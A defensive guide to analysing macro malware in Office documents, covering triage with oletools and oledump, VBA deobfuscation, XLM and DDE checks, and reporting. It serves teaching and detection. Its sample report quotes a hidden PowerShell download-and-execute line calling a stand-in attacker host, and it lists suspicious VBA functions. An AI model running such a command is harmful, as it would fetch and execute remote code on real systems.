Analyzing Macro Malware in Office Documents

When to Use

A suspicious Office document (.doc, .docm, .xls, .xlsm, .ppt) has been flagged by email security
Investigating phishing campaigns that deliver weaponized Office documents
Extracting VBA macro code to identify the payload download URL and execution method
Analyzing obfuscated VBA code to understand the full attack chain
Determining if a document uses DDE, ActiveX, or remote template injection instead of macros

Do not use for in-depth analysis of non-macro Office threats (DDE, remote template injection); this skill covers detecting them, but specialized analysis may be needed afterwards.

Prerequisites

Python 3.8+ with oletools installed (pip install oletools)
oledump.py from Didier Stevens (https://blog.didierstevens.com/programs/oledump-py/)
Isolated analysis VM without Microsoft Office installed (prevents accidental execution)
XLMDeobfuscator for Excel 4.0 macro analysis (pip install xlmdeobfuscator)
LibreOffice for safe document rendering (does not execute VBA macros by default)

Workflow

Step 1: Initial Document Triage

Determine if the document contains macros or other active content:

# Quick triage with olevba
olevba suspect.docm

# Check for OLE streams and macros
oleid suspect.docm

# Output indicators:
# VBA Macros:        True/False
# XLM Macros:        True/False
# External Relationships: True/False (remote template)
# ObjectPool:        True/False (embedded objects)
# Flash:             True/False (SWF objects)

# Comprehensive OLE analysis
oledump.py suspect.docm

# List all OLE streams with macro indicators
# Streams marked with 'M' contain VBA macro code
# Streams marked with 'm' contain only attribute statements (no code)
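Before running the tools above, it can help to confirm which container format the file really uses, since the extension may be wrong. The following is a minimal sketch, assuming only the well-known OLE2 and ZIP signatures; the function name `classify_office_file` and the returned dictionary layout are hypothetical, not part of oletools or oledump.

```python
import io
import zipfile

OLE_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")  # OLE2 compound file signature
ZIP_MAGIC = b"PK\x03\x04"                      # ZIP local file header (OOXML)

def classify_office_file(data: bytes) -> dict:
    """Classify raw document bytes without opening them in Office."""
    result = {"container": "unknown", "vba_project": False, "parts": []}
    if data.startswith(OLE_MAGIC):
        result["container"] = "ole"
    elif data.startswith(ZIP_MAGIC):
        result["container"] = "ooxml"
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            names = z.namelist()
        # OOXML files keep their VBA project in an embedded OLE file
        result["parts"] = [n for n in names if n.lower().endswith("vbaproject.bin")]
        result["vba_project"] = bool(result["parts"])
    return result

# Demo on an in-memory sample instead of a real suspect file
sample = io.BytesIO()
with zipfile.ZipFile(sample, "w") as z:
    z.writestr("word/vbaProject.bin", b"placeholder")
print(classify_office_file(sample.getvalue()))
```

For a real sample, read the bytes with `open("suspect.docm", "rb").read()` inside the analysis VM. A missing `vbaProject.bin` does not rule out XLM macros, DDE, or remote templates.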

Step 2: Extract and Analyze VBA Code

Pull out the complete VBA macro source:

# Extract VBA, decode encoded strings, and attempt to deobfuscate VBA expressions
olevba --decode --deobf suspect.docm

# Extract just the VBA source code
olevba --code suspect.docm > extracted_vba.txt

# Detailed extraction with oledump
oledump.py -s 8 -v suspect.docm  # Stream 8 (adjust based on stream listing)

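# Dump decompressed VBA from all streams
oledump.py -s a -v suspect.docm

# Highlight Declare statements and CreateObject calls in the VBA code
oledump.py -p plugin_vba_dco suspect.docm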

Key VBA Elements to Identify:
━━━━━━━━━━━━━━━━━━━━━━━━━━━
Auto-Execution Triggers:
  - AutoOpen (Word) / Auto_Open (Excel)
  - AutoClose (Word) / Auto_Close (Excel)
  - Document_Open / Document_Close (Word)
  - Workbook_Open (Excel)
  - AutoExec (Word, runs when the application starts)

Suspicious Functions:
  - Shell() / Shell.Application
  - WScript.Shell.Run / Exec
  - CreateObject("WScript.Shell")
  - PowerShell execution
  - URLDownloadToFile
  - MSXML2.XMLHTTP (HTTP requests)
  - ADODB.Stream (file writing)
  - Environ() (environment variables)
  - CallByName (indirect method calls)
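The checklist above can be applied mechanically to the extracted source as a first pass. This is a rough sketch that only searches for the keywords listed in this section; `scan_vba` and the two keyword lists are illustrative names, and a hit is a lead for manual review, not proof of malicious behavior.

```python
import re

AUTO_EXEC = ["AutoOpen", "Auto_Open", "AutoClose", "Auto_Close", "AutoExec",
             "Document_Open", "Document_Close", "Workbook_Open"]
SUSPICIOUS = ["Shell", "WScript.Shell", "CreateObject", "PowerShell",
              "URLDownloadToFile", "MSXML2.XMLHTTP", "ADODB.Stream",
              "Environ", "CallByName"]

def scan_vba(code: str) -> dict:
    """Return the checklist keywords that occur in the VBA source."""
    hits = {"auto_exec": [], "suspicious": []}
    for label, keywords in (("auto_exec", AUTO_EXEC), ("suspicious", SUSPICIOUS)):
        for kw in keywords:
            # VBA is case-insensitive; the lookarounds avoid matching
            # a keyword inside a longer identifier
            pattern = r"(?<![A-Za-z0-9_])" + re.escape(kw) + r"(?![A-Za-z0-9_])"
            if re.search(pattern, code, re.IGNORECASE):
                hits[label].append(kw)
    return hits

sample = '''Sub AutoOpen()
    Set sh = CreateObject("WScript.Shell")
    sh.Run "powershell -nop -w hidden"
End Sub'''
print(scan_vba(sample))
```

Obfuscated samples often build these names at runtime, so an empty result on raw source should be re-checked after deobfuscation.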

Step 3: Deobfuscate VBA Code

Remove obfuscation layers to reveal the payload:

# VBA deobfuscation techniques (heuristic; review the output manually)
import re

def deobfuscate_vba(code):
    # 1. Resolve Chr()/Chr$()/ChrW()/ChrW$() calls to quoted string literals:
    #    Chr(104) & Chr(116) -> "h" & "t" (merged into "ht" in step 4)
    def resolve_chr(match):
        try:
            char = chr(int(match.group(1)))
        except (ValueError, OverflowError):
            return match.group(0)  # out-of-range code point: leave untouched
        # A double quote inside a VBA string literal is written as ""
        return '"' + char.replace('"', '""') + '"'
    code = re.sub(r'\bChrW?\$?\((\d+)\)', resolve_chr, code, flags=re.IGNORECASE)

    # 2. Resolve StrReverse: StrReverse("exe.daolnwod") -> "download.exe"
    def resolve_reverse(match):
        return '"' + match.group(1)[::-1] + '"'
    code = re.sub(r'\bStrReverse\("([^"]+)"\)', resolve_reverse, code,
                  flags=re.IGNORECASE)

    # 3. Resolve Replace(): Replace("Powxershxell", "x", "") -> "Powershell"
    def resolve_replace(match):
        original, find, replace_with = match.groups()
        return '"' + original.replace(find, replace_with) + '"'
    code = re.sub(r'\bReplace\("([^"]+)",\s*"([^"]+)",\s*"([^"]*)"\)',
                  resolve_replace, code, flags=re.IGNORECASE)

    # 4. Merge adjacent literals last, so strings produced by the steps above
    #    are joined too: "htt" & "p://" -> "http://"
    code = re.sub(r'"\s*[&+]\s*"', '', code)

    # 5. Mid$/Left$/Right$ slicing is not handled here; flag it for manual review

    return code

with open("extracted_vba.txt", encoding="utf-8", errors="replace") as f:
    vba_code = f.read()

deobfuscated = deobfuscate_vba(vba_code)
print(deobfuscated)
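Deobfuscated macros frequently end in a `powershell -enc ...` command line, as in the sample report later in this document. PowerShell's `-EncodedCommand` argument is Base64 over UTF-16LE text, so it can be decoded offline. The sketch below assumes that encoding; `decode_encoded_commands` is a hypothetical helper and the URL in the demo is a placeholder.

```python
import base64
import binascii
import re

# A dash-prefixed flag starting with "e", followed by a Base64 token
FLAG_RE = re.compile(r"(?<!\S)-(e[a-z]*)\s+([A-Za-z0-9+/]+={0,2})", re.IGNORECASE)

def decode_encoded_commands(command_line: str) -> list:
    """Decode PowerShell -EncodedCommand arguments (Base64 over UTF-16LE)."""
    results = []
    for flag, b64 in FLAG_RE.findall(command_line):
        flag = flag.lower()
        # PowerShell accepts prefixes of -EncodedCommand (-e, -enc, ...) and -ec
        if not ("encodedcommand".startswith(flag) or flag == "ec"):
            continue
        padded = b64 + "=" * (-len(b64) % 4)
        try:
            raw = base64.b64decode(padded)
        except binascii.Error:
            continue  # truncated or otherwise invalid Base64
        results.append(raw.decode("utf-16-le", errors="replace"))
    return results

# Demo: build an encoded command from a known script, then decode it again
script = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/payload.ps1')"
encoded = base64.b64encode(script.encode("utf-16-le")).decode("ascii")
print(decode_encoded_commands(f"powershell -nop -w hidden -enc {encoded}"))
```

Decoding never executes the payload, so this is safe to run on the analysis host. Nested encodings (a second Base64 or compression layer inside the decoded script) need another pass.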

Step 4: Analyze Excel 4.0 (XLM) Macros

Handle legacy Excel macros that bypass VBA detection:

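# Detect XLM macros (current olevba releases extract XLM macros by default)
olevba suspect.xlsm

# Deobfuscate XLM macros
xlmdeobfuscator -f suspect.xlsm

# Manual XLM analysis of a legacy .xls workbook with oledump
# (plugin_biff parses BIFF records; -x selects Excel 4.0 macro records)
oledump.py -p plugin_biff.py --pluginoptions "-x" suspect.xls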

# XLM (Excel 4.0) macro functions to watch for:
# EXEC()       - Execute shell command
# CALL()       - Call DLL function
# REGISTER()   - Register DLL function
# URLDownloadToFileA - Windows API (urlmon.dll) invoked through CALL()/REGISTER() to download a file
# ALERT()      - Display message (social engineering)
# HALT()       - Stop execution
# GOTO()       - Control flow
# IF()         - Conditional execution
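XLM macros usually live on macro sheets that the author hides from the user. In an OOXML workbook the sheet visibility is recorded in `xl/workbook.xml`, so hidden sheets can be listed without opening Excel. The following is a sketch under that assumption; it also assumes macro sheets are stored under `xl/macrosheets/`, and `list_sheet_states` is an illustrative name.

```python
import io
import zipfile
import xml.etree.ElementTree as ET

NS = {"m": "http://schemas.openxmlformats.org/spreadsheetml/2006/main"}

def list_sheet_states(workbook_bytes: bytes):
    """Return ([(sheet name, state), ...], [macro sheet parts]) for an OOXML workbook."""
    with zipfile.ZipFile(io.BytesIO(workbook_bytes)) as z:
        root = ET.fromstring(z.read("xl/workbook.xml"))
        macro_parts = [n for n in z.namelist() if n.startswith("xl/macrosheets/")]
    # A missing state attribute means the sheet is visible
    sheets = [(s.get("name"), s.get("state", "visible"))
              for s in root.findall("m:sheets/m:sheet", NS)]
    return sheets, macro_parts

# Demo workbook built in memory; real samples are read from disk as bytes
workbook_xml = (
    '<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main">'
    '<sheets><sheet name="Sheet1" sheetId="1"/>'
    '<sheet name="Macro1" sheetId="2" state="veryHidden"/></sheets></workbook>'
)
demo = io.BytesIO()
with zipfile.ZipFile(demo, "w") as z:
    z.writestr("xl/workbook.xml", workbook_xml)
    z.writestr("xl/macrosheets/sheet1.xml", "<xm:macrosheet/>")
print(list_sheet_states(demo.getvalue()))
```

Sheets in the `hidden` or `veryHidden` state combined with a macro sheet part are a strong reason to run xlmdeobfuscator on the file.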

Step 5: Check for Non-Macro Attack Vectors

Examine the document for DDE, remote templates, and embedded objects:

# Check for DDE (Dynamic Data Exchange) fields and remote templates
python3 - <<'EOF'
import html
import re
import zipfile

with zipfile.ZipFile('suspect.docx') as z:
    for name in z.namelist():
        if not (name.endswith('.xml') or name.endswith('.rels')):
            continue
        # Unescape entities so &quot; inside field codes becomes a plain quote
        content = html.unescape(z.read(name).decode('utf-8', errors='ignore'))
        # DDE / DDEAUTO field codes
        if re.search(r'\bDDE(AUTO)?\b', content):
            print(f'[!] DDE found in {name}')
            for m in re.findall(r'\bDDE(?:AUTO)?\b[^"]*"([^"]+)"', content):
                print(f'    Command: {m}')
        # Remote template: an attachedTemplate relationship with an http(s) target
        if 'attachedTemplate' in content:
            for url in re.findall(r'Target="(https?://[^"]+)"', content):
                print(f'[!] Remote template URL: {url}')
EOF

# Extract embedded OLE objects for inspection (oleobj is part of oletools)
oleobj suspect.docm

# Check relationships for external references
python3 - <<'EOF'
import re
import zipfile

with zipfile.ZipFile('suspect.docx') as z:
    for name in z.namelist():
        if not name.endswith('.rels'):
            continue
        content = z.read(name).decode('utf-8', errors='ignore')
        # External targets are marked TargetMode="External" in .rels parts
        if 'TargetMode="External"' in content:
            print(f'External reference in {name}:')
            for rel in re.findall(r'<Relationship\b[^>]*TargetMode="External"[^>]*>', content):
                target = re.search(r'Target="([^"]+)"', rel)
                if target:
                    print(f'  {target.group(1)}')
EOF

Step 6: Generate Analysis Report

Document the complete macro malware analysis:

Report should include:
- Document metadata (author, creation date, modification date)
- Macro presence and type (VBA, XLM, DDE, remote template)
- Auto-execution trigger identified
- Deobfuscated VBA source code (key functions)
- Download URL(s) for second-stage payloads
- Execution method (Shell, WScript, PowerShell, COM object)
- Social engineering lure description
- Extracted IOCs (URLs, domains, IPs, file hashes)
- YARA rule for the specific document pattern
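The IOC and hash items in this list can be collected with a short script once the deobfuscated code is available. This is a minimal sketch, not a complete IOC extractor: the regular expressions are deliberately simple, the defanging style (`hxxp`, `[.]` before the last label) mirrors the sample report in this document, and all function names are hypothetical.

```python
import hashlib
import re
from urllib.parse import urlsplit

URL_RE = re.compile(r"\b(?:https?|ftp)://[^\s\"'<>)]+", re.IGNORECASE)
IPV4_RE = re.compile(r"(?<!\d)(?:\d{1,3}\.){3}\d{1,3}(?!\d)")

def defang(indicator: str) -> str:
    """Make an indicator non-clickable: http -> hxxp, last host dot -> [.]"""
    scheme, sep, rest = indicator.partition("://")
    if not sep:                      # bare host or IP address, no scheme
        scheme, rest = "", indicator
    host, slash, path = rest.partition("/")
    head, dot, tail = host.rpartition(".")
    if dot:
        host = head + "[.]" + tail
    prefix = scheme.lower().replace("http", "hxxp") + "://" if sep else ""
    return prefix + host + slash + path

def extract_iocs(text: str) -> dict:
    """Collect defanged URLs, hostnames, and IPv4 addresses from text."""
    urls = sorted(set(URL_RE.findall(text)))
    hosts = sorted({urlsplit(u).hostname for u in urls if urlsplit(u).hostname})
    ips = sorted({ip for ip in IPV4_RE.findall(text)
                  if all(int(octet) <= 255 for octet in ip.split("."))})
    return {"urls": [defang(u) for u in urls],
            "hosts": [defang(h) for h in hosts],
            "ips": [defang(i) for i in ips]}

def sha256_hex(data: bytes) -> str:
    """SHA-256 of the raw document bytes, for the report header."""
    return hashlib.sha256(data).hexdigest()

text = "DownloadString('http://example.com/payload.ps1') then beacon to 203.0.113.7"
print(extract_iocs(text))
```

The IPv4 pattern also matches dotted version strings, so results should be reviewed before they are shared as indicators.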

Key Concepts

| Term | Definition |
|------|------------|
| VBA Macro | Visual Basic for Applications code embedded in Office documents that can interact with the OS, download files, and execute commands |
| AutoOpen / Auto_Open | Macro procedure names that run automatically when a file is opened (AutoOpen in Word, Auto_Open in Excel); together with Document_Open and Workbook_Open, the primary triggers for macro malware |
| OLE (Object Linking and Embedding) | Microsoft compound document format; legacy Office files (.doc, .xls, .ppt) are OLE containers whose streams can hold macros and objects, and OOXML files store their VBA project in an embedded OLE file (vbaProject.bin) |
| DDE (Dynamic Data Exchange) | Legacy Windows IPC mechanism abused in documents to execute commands without macros; triggered by field code updates |
| Remote Template Injection | Attack loading a macro-enabled template from a remote URL when the document opens, bypassing initial macro detection |
| XLM Macros (Excel 4.0) | Legacy Excel macro language predating VBA; stored in macro sheets that are often hidden and frequently missed by traditional VBA analysis tools |
| Protected View | Read-only sandbox mode for files from untrusted sources; macros do not run until the user leaves it ("Enable Editing") and then clicks "Enable Content", so social engineering lures target these prompts |

Tools & Systems

oletools (olevba): Python toolkit for analyzing OLE files, extracting VBA macros, and detecting suspicious keywords and IOCs
oledump.py: Didier Stevens' tool for analyzing OLE streams with plugin support for VBA decompression and extraction
XLMDeobfuscator: Tool specifically designed for deobfuscating Excel 4.0 (XLM) macro formulas
ViperMonkey: VBA emulation engine that executes VBA macros in a sandboxed environment to observe behavior
YARA: Pattern matching for document-based malware detection using VBA string patterns and OLE structure indicators

Common Scenarios

Scenario: Analyzing a Phishing Document with Obfuscated VBA Macros

Context: Multiple employees received an email with an attached .docm file claiming to be an invoice. The document prompts users to "Enable Content" to view the full document.

Approach:

Run oleid to confirm VBA macros are present, then olevba to identify auto-execution triggers
Extract VBA code with olevba --decode --deobf for initial deobfuscation
Identify the auto-execution entry point (Auto_Open or Document_Open)
Trace the execution flow from the entry point through helper functions
Deobfuscate string concatenation and Chr() encoding to reveal the download URL
Identify the download method (WScript.Shell, MSXML2.XMLHTTP, PowerShell)
Extract all IOCs and create YARA rules for the specific obfuscation pattern

Pitfalls:

Opening the document in Microsoft Office for "quick analysis" instead of using command-line tools
Missing VBA code stored in UserForms (GUI elements can contain code in their event handlers)
Ignoring document metadata that may contain attacker fingerprints (author name, template name)
Not checking for both VBA and XLM macros in the same document (some malware uses both)

Output Format

OFFICE MACRO MALWARE ANALYSIS
================================
Document:         invoice_q3_2025.docm
SHA-256:          e3b0c44298fc1c149afbf4c8996fb924...
File Type:        Microsoft Word Document (OOXML with macros)
Author:           Administrator
Creation Date:    2025-09-10 14:23:00

MACRO ANALYSIS
Type:             VBA Macro
Trigger:          AutoOpen()
Streams:          3 VBA streams (ThisDocument, Module1, Module2)

DEOBFUSCATED EXECUTION CHAIN
1. AutoOpen() -> Calls Module1.RunPayload()
2. RunPayload() builds command string via Chr() concatenation
3. Command: powershell -nop -w hidden -enc JABjAGwAaQBlAG4AdAA...
4. Decoded: IEX (New-Object Net.WebClient).DownloadString('hxxp://evil[.]com/payload.ps1')

SOCIAL ENGINEERING LURE
- Document displays fake "Protected Document" image
- Instructs user to "Enable Content" to view the document
- Content is blurred/hidden until macros execute

EXTRACTED IOCs
Download URL:     hxxp://evil[.]com/payload.ps1
C2 Domain:        evil[.]com
IP Address:       185.220.101[.]42
User-Agent:       PowerShell (default WebClient)

MITRE ATT&CK
T1566.001  Phishing: Spearphishing Attachment
T1204.002  User Execution: Malicious File
T1059.001  Command and Scripting Interpreter: PowerShell
T1059.005  Command and Scripting Interpreter: Visual Basic
